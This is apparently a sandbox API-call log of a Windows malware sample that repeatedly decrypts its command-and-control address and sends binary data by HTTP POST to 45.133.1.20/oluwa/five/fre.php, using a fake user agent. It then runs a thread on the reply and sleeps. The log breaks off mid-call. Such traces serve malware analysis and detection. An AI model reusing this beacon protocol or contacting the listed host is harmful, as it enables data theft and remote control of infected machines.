StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0169.476] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0169.477] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0169.477] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0169.478] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0169.478] GetProcessHeap () returned 0x6a0000 [0169.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0169.478] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0169.478] GetProcessHeap () returned 0x6a0000 [0169.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0169.479] GetProcessHeap () returned 0x6a0000 [0169.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0169.480] GetProcessHeap () returned 0x6a0000 [0169.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0169.480] GetProcessHeap () returned 0x6a0000 [0169.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0169.481] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.481] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0169.488] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.488] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0169.496] GetProcessHeap () returned 0x6a0000 [0169.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0169.497] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.497] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0169.498] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.499] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0169.499] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.500] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0169.500] GetProcessHeap () returned 0x6a0000 [0169.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0169.501] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.501] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0169.502] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.503] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0169.503] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.504] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0169.504] GetProcessHeap () returned 0x6a0000 [0169.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0169.505] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0169.505] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0169.506] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0169.506] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0169.507] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0169.507] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0169.509] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0169.509] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0169.509] GetProcessHeap () returned 0x6a0000 [0169.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0169.509] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6ba0e0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be940*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0169.509] GetProcessHeap () returned 0x6a0000 [0169.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9f0 [0169.509] socket (af=2, type=1, protocol=6) returned 0x338 [0169.510] connect (s=0x338, name=0x6be940*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0169.534] FreeAddrInfoW (pAddrInfo=0x6ba0e0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be940*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0169.534] GetProcessHeap () returned 0x6a0000 [0169.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf0e0 [0169.535] GetProcessHeap () returned 0x6a0000 [0169.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0169.535] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0169.536] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0169.536] GetProcessHeap () returned 0x6a0000 [0169.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0169.536] GetProcessHeap () returned 0x6a0000 [0169.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0169.537] GetProcessHeap () returned 0x6a0000 [0169.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0169.537] GetProcessHeap () returned 0x6a0000 [0169.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0169.538] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0169.539] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0169.539] GetProcessHeap () returned 0x6a0000 [0169.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0169.539] GetProcessHeap () returned 0x6a0000 [0169.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0169.563] send (s=0x338, buf=0x6bbd20*, len=242, flags=0) returned 242 [0169.565] send (s=0x338, buf=0x6bb998*, len=159, flags=0) returned 159 [0169.565] GetProcessHeap () returned 0x6a0000 [0169.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0169.565] recv (in: s=0x338, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0169.639] GetProcessHeap () returned 0x6a0000 [0169.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0169.639] GetProcessHeap () returned 0x6a0000 [0169.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0169.640] GetProcessHeap () returned 0x6a0000 [0169.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0169.640] GetProcessHeap () returned 0x6a0000 [0169.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf0e0 | out: hHeap=0x6a0000) returned 1 [0169.640] closesocket (s=0x338) returned 0 [0169.641] GetProcessHeap () returned 0x6a0000 [0169.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9f0 | out: hHeap=0x6a0000) returned 1 [0169.641] GetProcessHeap () returned 0x6a0000 [0169.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0169.643] GetProcessHeap () returned 0x6a0000 [0169.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0169.643] GetProcessHeap () returned 0x6a0000 [0169.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0169.644] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x224) returned 0x338 [0169.646] Sleep (dwMilliseconds=0xea60) [0169.647] GetProcessHeap () returned 0x6a0000 [0169.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0169.648] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.648] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0169.657] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.657] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0169.664] GetProcessHeap () returned 0x6a0000 [0169.664] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b6ab8 [0169.666] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.667] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b6ab8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0169.667] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.667] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0169.668] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.668] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0169.669] GetProcessHeap () returned 0x6a0000 [0169.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6ab8 | out: hHeap=0x6a0000) returned 1 [0169.670] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.670] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0169.671] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.671] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0169.672] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.672] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0169.672] GetProcessHeap () returned 0x6a0000 [0169.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0169.673] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0169.674] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0169.682] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0169.682] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0169.683] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0169.683] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0169.684] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0169.685] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0169.685] GetProcessHeap () returned 0x6a0000 [0169.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0169.685] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0169.686] GetProcessHeap () returned 0x6a0000 [0169.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0169.687] GetProcessHeap () returned 0x6a0000 [0169.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0169.687] GetProcessHeap () returned 0x6a0000 [0169.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0169.689] GetProcessHeap () returned 0x6a0000 [0169.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0169.690] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.690] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0169.698] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.698] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0169.710] GetProcessHeap () returned 0x6a0000 [0169.710] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0169.711] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.712] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0169.712] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.713] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0169.714] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.714] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0169.714] GetProcessHeap () returned 0x6a0000 [0169.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0169.716] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.716] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0169.717] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.717] CryptDestroyKey (hKey=0x6ad020) returned 1 [0169.718] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.719] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0169.719] GetProcessHeap () returned 0x6a0000 [0169.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0169.720] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0169.720] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0169.721] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0169.722] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0169.722] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0169.723] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0169.724] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0169.724] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0169.724] GetProcessHeap () returned 0x6a0000 [0169.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0169.724] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6ba668*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be9e8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0169.724] GetProcessHeap () returned 0x6a0000 [0169.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa80 [0169.724] socket (af=2, type=1, protocol=6) returned 0x33c [0169.725] connect (s=0x33c, name=0x6be9e8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0169.753] FreeAddrInfoW (pAddrInfo=0x6ba668*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be9e8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0169.753] GetProcessHeap () returned 0x6a0000 [0169.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0169.753] GetProcessHeap () returned 0x6a0000 [0169.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0169.754] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0169.755] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0169.755] GetProcessHeap () returned 0x6a0000 [0169.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0169.755] GetProcessHeap () returned 0x6a0000 [0169.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0169.756] GetProcessHeap () returned 0x6a0000 [0169.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0169.756] GetProcessHeap () returned 0x6a0000 [0169.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0169.757] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0169.758] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0169.758] GetProcessHeap () returned 0x6a0000 [0169.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0169.758] GetProcessHeap () returned 0x6a0000 [0169.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0169.759] send (s=0x33c, buf=0x6bbd20*, len=242, flags=0) returned 242 [0169.759] send (s=0x33c, buf=0x6bb998*, len=159, flags=0) returned 159 [0169.759] GetProcessHeap () returned 0x6a0000 [0169.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0169.759] recv (in: s=0x33c, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0169.855] GetProcessHeap () returned 0x6a0000 [0169.856] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0169.856] GetProcessHeap () returned 0x6a0000 [0169.856] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0169.856] GetProcessHeap () returned 0x6a0000 [0169.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0169.857] GetProcessHeap () returned 0x6a0000 [0169.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0169.857] closesocket (s=0x33c) returned 0 [0169.858] GetProcessHeap () returned 0x6a0000 [0169.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa80 | out: hHeap=0x6a0000) returned 1 [0169.858] GetProcessHeap () returned 0x6a0000 [0169.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0169.859] GetProcessHeap () returned 0x6a0000 [0169.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0169.859] GetProcessHeap () returned 0x6a0000 [0169.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0169.860] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xee0) returned 0x33c [0169.862] Sleep (dwMilliseconds=0xea60) [0169.863] GetProcessHeap () returned 0x6a0000 [0169.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0169.864] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.865] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0169.876] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.876] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0169.967] GetProcessHeap () returned 0x6a0000 [0169.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0170.022] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.023] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0170.024] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.025] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0170.026] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.026] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0170.026] GetProcessHeap () returned 0x6a0000 [0170.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0170.027] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.027] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0170.028] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.028] CryptDestroyKey (hKey=0x6ad020) returned 1 [0170.029] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.031] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0170.031] GetProcessHeap () returned 0x6a0000 [0170.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0170.031] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.032] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0170.032] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.033] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0170.034] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.034] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0170.034] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.035] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0170.035] GetProcessHeap () returned 0x6a0000 [0170.035] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 